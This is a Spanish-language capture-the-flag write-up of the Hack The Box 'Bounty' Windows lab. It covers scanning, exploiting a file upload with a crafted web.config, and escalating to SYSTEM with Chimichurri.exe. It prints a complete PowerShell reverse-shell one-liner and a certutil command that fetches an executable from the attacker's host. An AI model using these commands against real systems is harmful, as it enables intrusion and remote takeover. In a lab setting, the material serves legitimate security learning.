Bounty
Bounty
Windows · Easy - Adventure mode
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ nmap -p- -sSVC --min-rate 5000 10.129.21.8
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:40 +0200
Nmap scan report for 10.129.21.8
Host is up (0.046s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: Bounty
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.56 seconds
Si abrimos la web solo nos muetra una imagen de un mago.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
└─$ feroxbuster -u http://10.129.21.8 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt -x aspx
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.21.8/
🚩 In-Scope Url │ 10.129.21.8
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [aspx]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 32l 121w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 156c http://10.129.21.8/aspnet_client => http://10.129.21.8/aspnet_client/
200 GET 22l 58w 941c http://10.129.21.8/transfer.aspx
301 GET 2l 10w 156c http://10.129.21.8/uploadedfiles => http://10.129.21.8/uploadedfiles/
200 GET 1624l 16517w 1403476c http://10.129.21.8/merlin.jpg
200 GET 32l 53w 630c http://10.129.21.8/
301 GET 2l 10w 156c http://10.129.21.8/uploadedFiles => http://10.129.21.8/uploadedFiles/
301 GET 2l 10w 156c http://10.129.21.8/UploadedFiles => http://10.129.21.8/UploadedFiles/
200 GET 22l 58w 941c http://10.129.21.8/Transfer.aspx
301 GET 2l 10w 156c http://10.129.21.8/Aspnet_client => http://10.129.21.8/Aspnet_client/
301 GET 2l 10w 156c http://10.129.21.8/aspnet_Client => http://10.129.21.8/aspnet_Client/
200 GET 22l 58w 941c http://10.129.21.8/TRANSFER.aspx
Está vez opté por usar feroxbuster para buscar posibles archivos y directorios. No se si acabaré por usarlo más que dirsearch.
Si accedemos a TRANSFER.asp vamos a encontrar un formulario el cual intenté primero subir una webshell, pero no función.
💣 Preparación:
Después de buscar un rato en Internet encontré lo que parece una forma muy sencilla de engañar al servidor, lo extraño aquí es que el servidor te deja subir este archivo web.config
👽 Acciones:
Subimos el web.config y se lo traga, dejando la posibilidad de RCE. Podemos valernos de esta webshell para obtener la primera bandera ff24964fd5496ce4b***
1
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.154',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
El payload que utilizé y que introduje en el formulario usando de nuevo https://www.revshells.com/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
PS C:\windows\system32\inetsrv> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
Ahora lanzamos la shell reversa que nos hemos copiado otra vez de https://www.revshells.com/
PS C:\windows\system32\inetsrv> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
bounty\merlin S-1-5-21-2239012103-4222820348-3209614936-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============================================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\DefaultAppPool Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
certutil -urlcache -split -f http://10.10.14.154/Chimichurri.exe
Recabo información del sistema para ver la versión del sistema y los permisos del usuario actual. También subo Chimichurri.exe
1
2
3
└─$ nc -lnvp 4444
listening on [any] 4445 ...
connect to [10.10.14.154] from (UNKNOWN) [10.129.22.213] 49161
Ponemos en escucha la reverseshell.
1
2
3
4
5
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\users\merlin\Downloads>whoami
whoami
nt authority\system
Y Chimichurri hace el trabajo y recibimos una shell siendo authority\system
Esta entrada está licenciada bajo CC BY 4.0 por el autor.